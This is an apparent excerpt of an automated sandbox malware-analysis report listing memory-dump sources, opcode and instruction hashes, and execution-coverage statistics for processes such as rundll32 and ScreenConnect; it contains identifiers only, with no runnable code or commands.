                                                                                                              • Instruction Fuzzy Hash: B0D02BB250030457DF144E68A4447153B55BB41324F38024CA522862C1E931D5038690
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 32f815154813d6c5817af27cb416c893ffa94badec75605c8770fe12b0fceb7c
                                                                                                              • Instruction ID: c2b14cb68a1309328d2b0b5d4e649ee8b4316d97be55f305470b973aeb4a17fd
                                                                                                              • Opcode Fuzzy Hash: 32f815154813d6c5817af27cb416c893ffa94badec75605c8770fe12b0fceb7c
                                                                                                              • Instruction Fuzzy Hash: EAC04CB6610200E7DA04CA30CD65B55B795EBA560DF28C8B9E506CB3C6DB23F9038640
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 312735b5ed5be68b176dd09f23c70931b4b1a0a2eb655823dec2897c446bebef
                                                                                                              • Instruction ID: 8b41962f68dc9c59817cb87ea05e4e4895f71bb2b6ee5ac5d5deb9c4e98f98d6
                                                                                                              • Opcode Fuzzy Hash: 312735b5ed5be68b176dd09f23c70931b4b1a0a2eb655823dec2897c446bebef
                                                                                                              • Instruction Fuzzy Hash: BEC0123211D3474FC70277F4A456D097F30D95122130507E7A539850E2D5684A89D305
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5e189895f0610fd5427000db79415f05a7b7737a3ff24ca2951c5a3872e99b48
                                                                                                              • Instruction ID: d026db80ad81af12ce8d298624bb5ba28dfbe94bbacfe7daab8eb599a26d9908
                                                                                                              • Opcode Fuzzy Hash: 5e189895f0610fd5427000db79415f05a7b7737a3ff24ca2951c5a3872e99b48
                                                                                                              • Instruction Fuzzy Hash: 9BB0927090530CAF9620DA99980196AB7ACDA4AA10F0001D9E90887320DA76AD1056D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d248c25b123555752459601f3bd103c795428dccd5f76965a9e0ea9f6d594939
                                                                                                              • Instruction ID: 335114a106387d80ba5b2a7a50af3c47f446e0b8bf74c055281c897a929d9a5a
                                                                                                              • Opcode Fuzzy Hash: d248c25b123555752459601f3bd103c795428dccd5f76965a9e0ea9f6d594939
                                                                                                              • Instruction Fuzzy Hash: 6FC08C744093428FDF019F18F8057AEBB70B746238F040BB0C4B00B6D3D3189941EB00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36aee89519d58bfe596fb2a4ac8c4c8ff85162118355888c5798f4de34309bd9
                                                                                                              • Instruction ID: f0e95aef6258de8e6023081f8e9af5ef2a406e41277525247009cb213fc56ffe
                                                                                                              • Opcode Fuzzy Hash: 36aee89519d58bfe596fb2a4ac8c4c8ff85162118355888c5798f4de34309bd9
                                                                                                              • Instruction Fuzzy Hash: 5D31E378A00618DFDB14DFA9D49599DBBFAFF88310B258069E905E7325DB34EC41CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb2d8b0278459da2dbb4781d989e7561fd8a3120dc5a9263a7047eee22face8d
                                                                                                              • Instruction ID: 31e2bd1badf03b9ed72d35f09cd6eeb3feda7962b759e873af06558ec77bf990
                                                                                                              • Opcode Fuzzy Hash: cb2d8b0278459da2dbb4781d989e7561fd8a3120dc5a9263a7047eee22face8d
                                                                                                              • Instruction Fuzzy Hash: 512178B17083149BF7255A66549477F3B9AEFC6220F14816AE80ECB281DD3D9C02C3A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d3ce84f3eafd675f09bf0b6736d4c774c8ccf3455dcc3811a65ed6f88a296b4a
                                                                                                              • Instruction ID: d2509f6312807ed1d7906e7fec7ca17a26135f895354f2a190b7265f902b9f63
                                                                                                              • Opcode Fuzzy Hash: d3ce84f3eafd675f09bf0b6736d4c774c8ccf3455dcc3811a65ed6f88a296b4a
                                                                                                              • Instruction Fuzzy Hash: CD21D3B27002569FFB289A39989477F77FABFC5200F14406EF41AC7245EB388901C751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2c56c0c78f3be54e3de4e9f6ae11d95c738fd4e435ae7bcb64e299f4a14871bf
                                                                                                              • Instruction ID: 967a9ef183dc232054b937195bb0b3fdf6a5836d6eb163fddd7cc69b8edd4368
                                                                                                              • Opcode Fuzzy Hash: 2c56c0c78f3be54e3de4e9f6ae11d95c738fd4e435ae7bcb64e299f4a14871bf
                                                                                                              • Instruction Fuzzy Hash: 7A210BB1B1A3656BFB35227468103BB3BADAF42620F0444A6E84DC7642DD5C9C42D3D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3950a3f4b80d3ed12905b1e6e8b8af6e7944d96f758f1a3827a06ae4f5b36ed0
                                                                                                              • Instruction ID: 86df8d9c2cfae6b8616a64acb36bf0f3ff22881cc8e199d60288a5bf03583dfc
                                                                                                              • Opcode Fuzzy Hash: 3950a3f4b80d3ed12905b1e6e8b8af6e7944d96f758f1a3827a06ae4f5b36ed0
                                                                                                              • Instruction Fuzzy Hash: B42167B4B01209DBEB18DFA5E4997EE7BB7EB88710F148019E406A7340DF795D05CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 271ee5177149bb8daf863bf1b4c8c4bb9f1c140c0ed9322e625313306f79c5c5
                                                                                                              • Instruction ID: b06380f2ce82a08cf90629bb2a0851d5b104a05484e1b78dab84e1ec0f2b4e6b
                                                                                                              • Opcode Fuzzy Hash: 271ee5177149bb8daf863bf1b4c8c4bb9f1c140c0ed9322e625313306f79c5c5
                                                                                                              • Instruction Fuzzy Hash: 7C213DB7704358CBFB248A7598506FA7FEAAFC4251F044067D509DB281DA398E16C791
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 01cf34f79d19a8fe13b95c0d05cbf96df07055da03076dd748b17721dcb4b223
                                                                                                              • Instruction ID: 3a39f430b56902e87c3311e54ef0700751c92ef9e3a210d5532cb70d010415df
                                                                                                              • Opcode Fuzzy Hash: 01cf34f79d19a8fe13b95c0d05cbf96df07055da03076dd748b17721dcb4b223
                                                                                                              • Instruction Fuzzy Hash: 382191B4B01209DBEB18DFA5D4997EE7BB7ABC8700F148029E406A7380DF795D01CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1974b808d4c1825e2f80eb1e625f510858deeecc90e15c92d6301eadec20df0b
                                                                                                              • Instruction ID: 3939636ec82d7933697ba15e34e03ce874b3dc01bb3956684b3bdba57570dbef
                                                                                                              • Opcode Fuzzy Hash: 1974b808d4c1825e2f80eb1e625f510858deeecc90e15c92d6301eadec20df0b
                                                                                                              • Instruction Fuzzy Hash: 92216275A041089FFB14DB64D892AAABBA6EFCC320F108119D509A7381DF396946CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 806b64f7b4f8fe5a466fe69fdfecd1b503bdd1ef5cbb40e674253b99e4063dee
                                                                                                              • Instruction ID: 50b1245ed4d32d09cc7973114db445806990731f3766d129231723d6dd37160f
                                                                                                              • Opcode Fuzzy Hash: 806b64f7b4f8fe5a466fe69fdfecd1b503bdd1ef5cbb40e674253b99e4063dee
                                                                                                              • Instruction Fuzzy Hash: 3C21D771A002499FEB24DB64D851AAEBBB7EFCC320F148019D409A7381DF399946CBD2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e0f4804cc9154727417295735a293415c1bdf2da4073e376549b32698ff0293c
                                                                                                              • Instruction ID: e9d9e57503f9da0a67d5388651d89ccc18b62f48d9a2f10d17a40e92521908a0
                                                                                                              • Opcode Fuzzy Hash: e0f4804cc9154727417295735a293415c1bdf2da4073e376549b32698ff0293c
                                                                                                              • Instruction Fuzzy Hash: 692108B5A102189FDB54DFA9D8809DEBBF5FF4D720F10812AE909EB320DB319941CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 717ca61b8793d5e55f31837c857bbc6a2a065b23b35fa91c713ca3a6da5a7342
                                                                                                              • Instruction ID: 145430b0b3c8a15920edb78fa3827d7a84f463b7b552e2ef94becfe572b6e498
                                                                                                              • Opcode Fuzzy Hash: 717ca61b8793d5e55f31837c857bbc6a2a065b23b35fa91c713ca3a6da5a7342
                                                                                                              • Instruction Fuzzy Hash: B51129B3A001199BEF348A68C8006EFBBFABB8C310F048039C419B7254DB3A9945C7A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 971b49ab1db190f30640cc14677793680f540bd70b85c26eeb76ff40b4c6e9b6
                                                                                                              • Instruction ID: 1b650833a38eb690568d8fb26053bf9d819403af47e93befa7b7e8b814052284
                                                                                                              • Opcode Fuzzy Hash: 971b49ab1db190f30640cc14677793680f540bd70b85c26eeb76ff40b4c6e9b6
                                                                                                              • Instruction Fuzzy Hash: 5F118471A00209DFEB14DB64C851AAEBBB7FFCC320F108029D509A7381DF799946CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b69c13d36ca73b4d0be97b3005e84e56e1107630097908141432c9f27de51d48
                                                                                                              • Instruction ID: ff6006b24da5d7a6f7c7edd26e1500f6a61b85c7b55d7703809712eb40ebf186
                                                                                                              • Opcode Fuzzy Hash: b69c13d36ca73b4d0be97b3005e84e56e1107630097908141432c9f27de51d48
                                                                                                              • Instruction Fuzzy Hash: D6117271A00108DFF724DB54D852AA97BB6EFCC320F108019D50DA7381DF79A94ACB96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 911caf999100e4952955eebbd056acc3eabe3dc26d4a53dafba83567fcfc9ee6
                                                                                                              • Instruction ID: ec160e294087db4457adcb2a0786430e275017d79f12469ff5391e4219216a5f
                                                                                                              • Opcode Fuzzy Hash: 911caf999100e4952955eebbd056acc3eabe3dc26d4a53dafba83567fcfc9ee6
                                                                                                              • Instruction Fuzzy Hash: 8E2102B5D002498FDB20DFAAD884AEEFBF0FF88224F14852ED559A7240C7795945CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48ac76f5d7ae5e37fa47b16244b442244622bf22db6f6c8e2a12c612c2aacca9
                                                                                                              • Instruction ID: 214e3a78d7d894aa348ceb16e48c3ab101714fd2e57df252b28699a8c81e124c
                                                                                                              • Opcode Fuzzy Hash: 48ac76f5d7ae5e37fa47b16244b442244622bf22db6f6c8e2a12c612c2aacca9
                                                                                                              • Instruction Fuzzy Hash: B601C4F2E112269FEB20DA7D94003ABB7E5EB89620F044436D54DD7300EA398901C7E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2169149291.00000000033DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033DD000, based on PE: false
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65b89097e045a40a6b0694370e886b7ace8e89094354ea30cf4abb7ca893b60b
                                                                                                              • Instruction ID: ed5e37ecea1c233d34f27cc79ef7c01d3d05b211d774ecafb4ab2c2d76cfa953
                                                                                                              • Opcode Fuzzy Hash: 65b89097e045a40a6b0694370e886b7ace8e89094354ea30cf4abb7ca893b60b
                                                                                                              • Instruction Fuzzy Hash: B2E026367003044BC304AA2AE840967F7AADBC9228B604079E10CC7315CD369C028690
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e3ae027bc9fc090e013ca0295968642619423e2b5a123db138f93ee35b0e4f41
                                                                                                              • Instruction ID: 77f771c8fea451011586e294ee311d2f711535b5ce933e3cc3f2c67b5ecbf9ab
                                                                                                              • Opcode Fuzzy Hash: e3ae027bc9fc090e013ca0295968642619423e2b5a123db138f93ee35b0e4f41
                                                                                                              • Instruction Fuzzy Hash: 42D0C736A1A3A05BEF2622B420102E7BFAC9B06020F0504D3F90CCA203D92C984083D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cc7fd9ab5dbf9fdb61dca5d34c5ed4b5988eb0c9c767e54f7f57fadc3b15db58
                                                                                                              • Instruction ID: c340af46d8f6dfbe0418a8d3cbf517419831498ad4e1b66ad216e0e2b464f348
                                                                                                              • Opcode Fuzzy Hash: cc7fd9ab5dbf9fdb61dca5d34c5ed4b5988eb0c9c767e54f7f57fadc3b15db58
                                                                                                              • Instruction Fuzzy Hash: 2FE0D8B5D09208EFDB01DB74EA8359C7FB4DB01200B1040E9E808DB141E9381F00CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 77bd63054e8ddd68b018f548877395cb0a592da02b60faa8f0801600c8a4ca66
                                                                                                              • Instruction ID: 0740cd8c4572eb2012ce7d891e0ae1b8eba88ce1826e1cb79bb07e5ea85fc1c2
                                                                                                              • Opcode Fuzzy Hash: 77bd63054e8ddd68b018f548877395cb0a592da02b60faa8f0801600c8a4ca66
                                                                                                              • Instruction Fuzzy Hash: 7DE02B3320D3945FC3075B60E8114E6BFB99B4B12030940ABF8808B362DD250D11D7D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a30996be9760c19699aa85b3dd89db3c856dd9782829ed389265b5d4321270cd
                                                                                                              • Instruction ID: 4f0f6c6f063e859b0c8ef536b224988c2a3bd70beda9a7fe4165c1ffc8e01226
                                                                                                              • Opcode Fuzzy Hash: a30996be9760c19699aa85b3dd89db3c856dd9782829ed389265b5d4321270cd
                                                                                                              • Instruction Fuzzy Hash: D6D0A7B226011CAB52246718D85596A7B99E7C5361750442BF90983610CD645C11D7DA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 80bf795ddf48e9d5b9052c4b5fde4a8712d36f628d9e2d27a6e68d5199accbe7
                                                                                                              • Instruction ID: 7008cc8911cf00545ca9381efb5ce9a8eddc7292d8f5c5e9a0421d2dabcd6b4a
                                                                                                              • Opcode Fuzzy Hash: 80bf795ddf48e9d5b9052c4b5fde4a8712d36f628d9e2d27a6e68d5199accbe7
                                                                                                              • Instruction Fuzzy Hash: 79D05B7490120DEFDB04DFB4EA4295DBBB9DB44300B104599E40DD7241DA755F009F91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4fe4cd9b30133ce38f256d26384b5242ae4719a32bfad136f0563c69be69a91
                                                                                                              • Instruction ID: e38453c5e4ef2cb48f71f47e3d1653eca0b8eb2545fcd765018a78a153420c11
                                                                                                              • Opcode Fuzzy Hash: a4fe4cd9b30133ce38f256d26384b5242ae4719a32bfad136f0563c69be69a91
                                                                                                              • Instruction Fuzzy Hash: 2BD05E74A0220DEFCB10EFBCE94259DBBF9EB45210B1141A9E80DD7200EF316F00AB82
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fe8f4bdef5161d5deae8b5f7b8e28342d3c4f9f16c170e2ec2f6f07a8ac0a79d
                                                                                                              • Instruction ID: 03685bde814f10af1fbf3cdaf1c3c0e57f9aa963b145577d59330bb3b992d6f0
                                                                                                              • Opcode Fuzzy Hash: fe8f4bdef5161d5deae8b5f7b8e28342d3c4f9f16c170e2ec2f6f07a8ac0a79d
                                                                                                              • Instruction Fuzzy Hash: 99C0123604D3915FC7134760A8824D1BF31AA2231174516DBE0C1C5493C2290999C7F1

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:13.8%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:6.7%
                                                                                                              Total number of Nodes:434
                                                                                                              Total number of Limit Nodes:32
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u$ ~u$ ~u
                                                                                                              • API String ID: 0-578007478
                                                                                                              • Opcode ID: 8ddb1cf68cb298ada912ea8ecaa6ec1ec6daf264786b4883b2ff05954cb5ada3
                                                                                                              • Instruction ID: 22dd01b222c4e7ec1bed7ab9f0ca6b2ebab90e7ebdac674d6f0415f473644362
                                                                                                              • Opcode Fuzzy Hash: 8ddb1cf68cb298ada912ea8ecaa6ec1ec6daf264786b4883b2ff05954cb5ada3
                                                                                                              • Instruction Fuzzy Hash: 5FE23974A01219CFDB25EF28C8546ADB7F6FF89300F1486A9D509AB354EB71AE85CF40

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: +$on^$;$on^$Ccj$S$on^
                                                                                                              • API String ID: 0-1455237188
                                                                                                              • Opcode ID: ef8008acfd3cb14b16b8577d42dd2781ea2ae77cb93277009881a46a27be4b79
                                                                                                              • Instruction ID: c9f388e034aef300eb2fbf6585747bb9dab866a3468bb940680bb45ad4ecc885
                                                                                                              • Opcode Fuzzy Hash: ef8008acfd3cb14b16b8577d42dd2781ea2ae77cb93277009881a46a27be4b79
                                                                                                              • Instruction Fuzzy Hash: 08323A74A00215CFDB14DF29D854AADBBF2EF89300F148AA9E509EB351DB74AD85CF80
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: fad174949390b081a4bcc4588188d68ae654bdfb20637c0807ac23504b963cf5
                                                                                                              • Instruction ID: b7302688081a637a05adefc6ebe39b3666b25fb1167c7d3e8c88968f39e991b2
                                                                                                              • Opcode Fuzzy Hash: fad174949390b081a4bcc4588188d68ae654bdfb20637c0807ac23504b963cf5
                                                                                                              • Instruction Fuzzy Hash: 56625D70E00219CFDB24DF69C854BADB7F2AF88300F1586A9D509AB350EB75AD85CF90
                                                                                                              APIs
                                                                                                              • RtlGetVersion.NTDLL(0000009C), ref: 00BF4DBE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4012479988.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_bf0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Version
                                                                                                              • String ID:
                                                                                                              • API String ID: 1889659487-0
                                                                                                              • Opcode ID: 141700ed86af471b0763f74f2fd6474b888f17734ce66788c645d1c1794d7432
                                                                                                              • Instruction ID: e02e76646bbb1553af75754ed953f75a52cc758d93ac9617d30712d4180486d7
                                                                                                              • Opcode Fuzzy Hash: 141700ed86af471b0763f74f2fd6474b888f17734ce66788c645d1c1794d7432
                                                                                                              • Instruction Fuzzy Hash: 6F417B71A0031D9FDB649F69D8097AEBBB5FB45300F0081E9D60CA7290DB795E88CF92
                                                                                                              APIs
                                                                                                              • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 04F819BF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
